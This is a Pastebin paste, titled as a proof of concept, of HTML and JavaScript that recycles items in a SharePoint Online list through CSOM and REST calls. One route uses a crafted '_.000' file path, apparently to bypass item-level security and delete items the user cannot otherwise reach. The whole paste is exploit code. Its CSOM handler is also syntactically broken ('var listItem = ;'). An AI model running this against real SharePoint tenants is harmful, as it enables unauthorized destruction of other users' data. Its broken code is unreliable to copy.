Guest User

SPO bypass sec bits POC

a guest
Jun 5th, 2017
97
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.         <input type="text" id="delete-input" />
  2. <div style="margin: 20px 0">
  3.         <input type="button" style="margin: 0; display: block;" value="RECYCLE AS CSOM" id="delete-button-csom" />
  4.         <input type="button" style="margin: 10px 0; display: block;" value="RECYCLE (ITEM API) AS REST" id="delete-button-rest" />
  5.         <input type="button" style="margin: 10px 0;display: block;" value="RECYCLE (FOLDER API) AS REST" id="delete-button-rest-folder" />
  6. </div>
  7.         <p id="delete-result"><p/>  
  8.  
  9. <script>
  10.            
  11.             var button = document.getElementById("delete-button-csom");
  12.             button.addEventListener('click', () => {
  13.             var input = document.getElementById("delete-input");
  14.             var container = document.getElementById("delete-result");
  15.  
  16.             if(isNaN(input.value)) {
  17.                 return;
  18.             }
  19.             var ctx =  SP.ClientContext.get_current();
  20.             var list = ctx.get_web().get_lists().getByTitle("TEST_BITS").list.getItemById(15).recycle();
  21.             var listItem = ;
  22.             listItem.recycle();
  23.             ctx.executeQueryAsync(() => {
  24.             container.innerHTML = "DELETED!";    
  25.         }, (s, e) => {
  26.             container.innerHTML = "FAIL:\r\n " + e.get_message();
  27.         });      
  28.        
  29.             });
  30.            
  31.            
  32.         button = document.getElementById("delete-button-rest");
  33.        
  34.             button.addEventListener('click', () => {
  35.             var input = document.getElementById("delete-input");
  36.             var container = document.getElementById("delete-result");
  37.  
  38.             if(isNaN(input.value)) {
  39.                 return;
  40.             }
  41.            
  42.             var request = new XMLHttpRequest();
  43.             request.open('POST', "https://TENANT.sharepoint.com/sites/dev-pp002/_api/web/lists/GetByTitle('TEST_BITS')/items("+Number(input.value)+")/recycle()", true);
  44.             request.setRequestHeader('Content-Type', 'application/json;odata=verbose');
  45.             request.setRequestHeader('X-RequestDigest', document.getElementById("__REQUESTDIGEST").value);
  46.             request.setRequestHeader('accept', 'application/json;odata=verbose');
  47.            
  48.             request.send({});
  49.             request.onload = function() {
  50.               if (request.status >= 200 && request.status < 400) {
  51.                 var resp = request.responseText;
  52.                 container.innerHTML = "OKAY: " + resp;
  53.               } else {
  54.                 var resp = request.responseText;
  55.                 container.innerHTML = "FAIL: " + resp;
  56.               }
  57.             };     
  58.                         });    
  59.                        
  60.         button = document.getElementById("delete-button-rest-folder");
  61.        
  62.             button.addEventListener('click', () => {
  63.             var input = document.getElementById("delete-input");
  64.             var container = document.getElementById("delete-result");
  65.  
  66.             if(isNaN(input.value)) {
  67.                 return;
  68.             }
  69.            
  70.             var request = new XMLHttpRequest();
  71.            
  72.             var sub = encodeURIComponent("/sites/dev-pp002/Lists/TEST_BITS/"+Number(input.value)+"_.000");
  73.             var q = "https://TENANT.sharepoint.com/sites/dev-pp002/_api/web/GetFileByServerRelativePath(DecodedUrl=@a1)/recycle?@a1='"+sub+"'";
  74.            
  75.             request.open('POST', q, true);
  76.             request.setRequestHeader('Content-Type', 'application/json;odata=verbose');
  77.             request.setRequestHeader('X-RequestDigest', document.getElementById("__REQUESTDIGEST").value);
  78.             request.setRequestHeader('accept', 'application/json;odata=verbose');
  79.            
  80.             request.send({});
  81.             request.onload = function() {
  82.               if (request.status >= 200 && request.status < 400) {
  83.                 var resp = request.responseText;
  84.                 container.innerHTML = "OKAY: " + resp;
  85.               } else {
  86.                 var resp = request.responseText;
  87.                 container.innerHTML = "FAIL: " + resp;
  88.               }
  89.             };     
  90.                         });                        
  91. </script>
RAW Paste Data